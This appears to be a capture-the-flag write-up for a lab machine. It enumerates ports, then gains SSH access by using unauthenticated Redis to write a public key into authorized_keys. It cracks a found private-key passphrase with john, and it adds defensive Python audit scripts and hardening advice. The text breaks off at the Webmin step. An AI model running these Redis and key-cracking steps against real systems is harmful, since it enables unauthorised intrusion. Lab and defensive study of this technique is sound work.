PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.78 seconds
We can see:
Port 80: HTTP server, Apache version 2.4.29.
Port 6379: Redis, an in-memory key/value store. It works much like a dictionary, with a number of keys and corresponding values that can both be set and retrieved, so it essentially serves as a data-structure server. Possibly vulnerable to RCE.
Port 10000: MiniServ 1.910 (Webmin), a web-based server management control panel for Unix-like systems. Possibly vulnerable to RCE.
Let's check out the HTTP server.
Let's run nikto and feroxbuster in the background and continue enumerating.
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.10.160
+ Target Hostname: 10.10.10.160
+ Target Port: 80
+ Start Time: 2023-12-30 03:42:28 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Server may leak inodes via ETags, header found with file /, inode: f04, size: 590f549ce0d74, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8048 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2023-12-30 03:46:22 (GMT-5) (234 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Not a whole lot here.
REDIS
We can check whether we can connect to the Redis server with the following tool:
redis-cli -h 10.10.10.160
We are let straight in (no authentication is in place).
We try to find any keys on the server:
keys *
This returns nothing.
Maybe we can write an SSH key to the
Let's check the current working directory of Redis:
config get dir
We can make an educated guess and say this is most likely the redis home directory; we can confirm this by changing the current directory to ./.ssh:
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> config set dir ./.ssh
OK
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"
Now that our commands have proven the existence of the .ssh directory, this is the redis home directory. Next we can create an SSH key and place it in the redis .ssh directory.
Let's generate our key pair:
ssh-keygen -t rsa
Next we want to place our public key into temp.txt; we also want to add two blank lines both before and after the key text.
Now we need to push our public key to the Redis server; for this we will use redis-cli:
cat temp.txt | redis-cli -h 10.10.10.160 -x set s-key
redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
Now we set the appropriate permissions on our private key and should be able to authenticate via SSH as redis with it:
chmod 600 id_rsa
ssh -i id_rsa redis@10.10.10.160
Now we have an SSH session as the user redis.
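From the defender's side, the SAVE above leaves an authorized_keys file that is mostly a binary RDB snapshot with one valid key line embedded in it; sshd skips lines it cannot parse, so the planted key still works. The following audit script is an added example written for this writeup (not code from the original post, from Redis, or from OpenSSH): it flags the RDB magic, lines with non-printable bytes, and any key whose base64 blob does not match its declared type, and lists the keys sshd would actually accept. The two sample files are constructed to mimic the shape of such a dump, not captured from the target.

```python
import base64
import re
import struct

# Key types sshd accepts in authorized_keys (a subset sufficient for this check;
# FIDO "sk-" types are not covered and would be reported as unparseable).
KNOWN_KEY_TYPES = {"ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256",
                   "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}

# An RDB snapshot written by Redis SAVE begins with "REDIS" and a 4-digit version.
RDB_MAGIC = re.compile(rb"^REDIS\d{4}")


def key_blob_type(blob_b64: str):
    """Decode an authorized_keys key blob and return the key type it embeds
    (SSH wire format puts the type string first), or None if it is not valid."""
    try:
        blob = base64.b64decode(blob_b64, validate=True)
    except ValueError:
        return None
    if len(blob) < 4:
        return None
    (n,) = struct.unpack(">I", blob[:4])
    if n > len(blob) - 4:
        return None
    return blob[4:4 + n].decode("ascii", errors="replace")


def audit_authorized_keys(data: bytes) -> dict:
    """Classify every line of an authorized_keys file.

    Returns {"keys": [(line_no, key_type, comment), ...],
             "anomalies": [(line_no, kind, detail), ...]}.
    sshd silently skips lines it cannot parse, which is what lets a key planted
    by a Redis dump survive inside binary garbage; here that garbage is reported."""
    report = {"keys": [], "anomalies": []}
    if RDB_MAGIC.match(data):
        report["anomalies"].append((0, "rdb-signature", "file starts with a Redis RDB header"))
    for line_no, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.strip()
        if not line or line.startswith(b"#"):
            continue
        if any(b < 0x20 or b > 0x7E for b in line):
            report["anomalies"].append((line_no, "binary-garbage", "non-printable bytes on line"))
            continue
        fields = line.decode("ascii").split()
        # Anything before the key type is an options field (from=, command=, ...).
        idx = next((i for i, f in enumerate(fields) if f in KNOWN_KEY_TYPES), None)
        if idx is None or idx + 1 >= len(fields):
            report["anomalies"].append((line_no, "unparseable", fields[0] if fields else ""))
            continue
        declared = fields[idx]
        embedded = key_blob_type(fields[idx + 1])
        if embedded != declared:
            report["anomalies"].append((line_no, "blob-mismatch", f"declared {declared}, blob says {embedded}"))
            continue
        report["keys"].append((line_no, declared, " ".join(fields[idx + 2:])))
    return report


# --- Constructed sample data (not captured from the target) -------------------
def _wire_string(s: bytes) -> bytes:
    return struct.pack(">I", len(s)) + s


# A syntactically valid ed25519 public key blob with a dummy 32-byte point.
SAMPLE_BLOB = base64.b64encode(
    _wire_string(b"ssh-ed25519") + _wire_string(b"\x01" * 32)).decode()


def build_samples():
    """Return (clean_file, planted_file) as bytes."""
    clean = f"# admin laptop\nssh-ed25519 {SAMPLE_BLOB} admin@host\n".encode()
    # Rough shape of what SAVE leaves behind when dir points at .ssh and
    # dbfilename is authorized_keys: RDB header and metadata, the stored value
    # (which the writeup pads with blank lines), then the EOF marker and checksum.
    planted = (b"REDIS0008\xfa\tredis-ver\x054.0.9\x00\x05s-key"
               + b"\n\nssh-ed25519 " + SAMPLE_BLOB.encode() + b" attacker@kali\n\n"
               + b"\xff" + b"\x00" * 8)
    return clean, planted


if __name__ == "__main__":
    for name, sample in zip(("clean", "planted"), build_samples()):
        print(name, audit_authorized_keys(sample))
```

Run this over the authorized_keys of every service account (redis, postgres, www-data and friends), not just interactive users; a service account with a valid key and an "rdb-signature" finding is the signature of exactly this technique. The root cause is the unauthenticated, network-reachable Redis: setting requirepass and binding to localhost (or keeping protected-mode on) closes it, and renaming or disabling CONFIG removes the file-write primitive for anyone who does get a connection.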
Priv esc via redis
We find an SSH private key in the /opt directory.
We can copy this over to our local machine and possibly crack the password.
First, let's generate a crackable hash using ssh2john:
sudo /opt/john/run/ssh2john.py id_rsa > hash
We can crack the hash:
john hash --wordlist=/usr/share/wordlists/rockyou.txt
We get the password:
computer2008
We couldn't SSH in, but in our already established shell as redis we can simply switch to the user Matt:
su Matt
We now have a session as Matt.
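The privilege escalation above worked because a private key sat where a low-privileged service account could read it and was protected only by a passphrase present in rockyou.txt. The script below is an added audit example for this writeup (my code, not from the original post or from OpenSSH): it parses the key header to tell whether a key is passphrase-protected at all, which cipher and KDF guard it, and whether the file is readable by anyone but its owner. The sample headers are constructed in-line and are not real keys; a key with no passphrase, or a legacy PEM key (whose MD5-based key derivation is far cheaper to crack than bcrypt), is what this audit exists to surface.

```python
import base64
import os
import stat
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _read_string(buf: bytes, off: int):
    """Read one SSH wire-format string (uint32 big-endian length + bytes)."""
    if off + 4 > len(buf):
        raise ValueError("truncated key header")
    (n,) = struct.unpack(">I", buf[off:off + 4])
    end = off + 4 + n
    if end > len(buf):
        raise ValueError("truncated key header")
    return buf[off + 4:end], end


def private_key_protection(pem_text: str) -> dict:
    """Report whether a private key file is passphrase-protected.

    Returns {"format", "encrypted", "cipher", "kdf"}; raises ValueError for
    input that is not a PEM-framed private key."""
    lines = [ln.strip() for ln in pem_text.strip().splitlines()]
    if len(lines) < 2 or not lines[0].startswith("-----BEGIN ") or not lines[-1].startswith("-----END "):
        raise ValueError("not a PEM-framed key")
    header, body = lines[0], lines[1:-1]

    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        # ssh-keygen default format: cipher and KDF names sit in a binary
        # header at the start of the base64 payload; "none" means no passphrase.
        blob = base64.b64decode("".join(body))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _read_string(blob, len(OPENSSH_MAGIC))
        kdf, _ = _read_string(blob, off)
        cipher, kdf = cipher.decode(), kdf.decode()
        return {"format": "openssh-key-v1", "encrypted": cipher != "none",
                "cipher": cipher, "kdf": kdf}

    if header == "-----BEGIN ENCRYPTED PRIVATE KEY-----":
        return {"format": "pkcs8", "encrypted": True, "cipher": "pkcs8", "kdf": "pkcs8"}

    if header.endswith(" PRIVATE KEY-----"):
        # Legacy PEM (ssh-keygen -m PEM): encryption is signalled by RFC 1421
        # style headers and the key is derived with OpenSSL's EVP_BytesToKey (MD5).
        hdrs = {}
        for ln in body:
            if ":" not in ln:
                break
            k, v = ln.split(":", 1)
            hdrs[k.strip()] = v.strip()
        encrypted = hdrs.get("Proc-Type", "").endswith("ENCRYPTED")
        cipher = hdrs["DEK-Info"].split(",", 1)[0] if encrypted and "DEK-Info" in hdrs else "none"
        return {"format": "pem", "encrypted": encrypted, "cipher": cipher,
                "kdf": "EVP_BytesToKey-md5" if encrypted else "none"}

    raise ValueError(f"unrecognised header: {header}")


def audit_key_file(path: str) -> dict:
    """Passphrase check plus the on-disk permission check for one key file."""
    st = os.stat(path)
    with open(path) as f:
        info = private_key_protection(f.read())
    info["path"] = path
    info["mode"] = oct(stat.S_IMODE(st.st_mode))
    info["readable_by_others"] = bool(st.st_mode & 0o077)
    return info


# --- Constructed sample headers (not real keys; only the fields read above) ---
def _wire_string(s: bytes) -> bytes:
    return struct.pack(">I", len(s)) + s


def build_samples() -> dict:
    def ossh(cipher: bytes, kdf: bytes) -> str:
        payload = (OPENSSH_MAGIC + _wire_string(cipher) + _wire_string(kdf)
                   + _wire_string(b"") + struct.pack(">I", 1))
        return ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
                + base64.b64encode(payload).decode()
                + "\n-----END OPENSSH PRIVATE KEY-----\n")
    return {
        "ossh_plain": ossh(b"none", b"none"),
        "ossh_bcrypt": ossh(b"aes256-ctr", b"bcrypt"),
        "pem_enc": ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
                    "AAAA\n-----END RSA PRIVATE KEY-----\n"),
        "pem_plain": "-----BEGIN RSA PRIVATE KEY-----\nAAAA\n-----END RSA PRIVATE KEY-----\n",
    }


if __name__ == "__main__":
    for name, text in build_samples().items():
        print(name, private_key_protection(text))
```

Point audit_key_file at anything under /opt, /home, /root or shared directories that looks like a key (the "-----BEGIN" header is a cheap grep). A key that reports encrypted False, a legacy "pem" format, or readable_by_others True should be rotated rather than merely chmod'ed, since a copy may already have been taken.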
miniserv
When we navigate to https://10.10.10.160:10000 we can see the following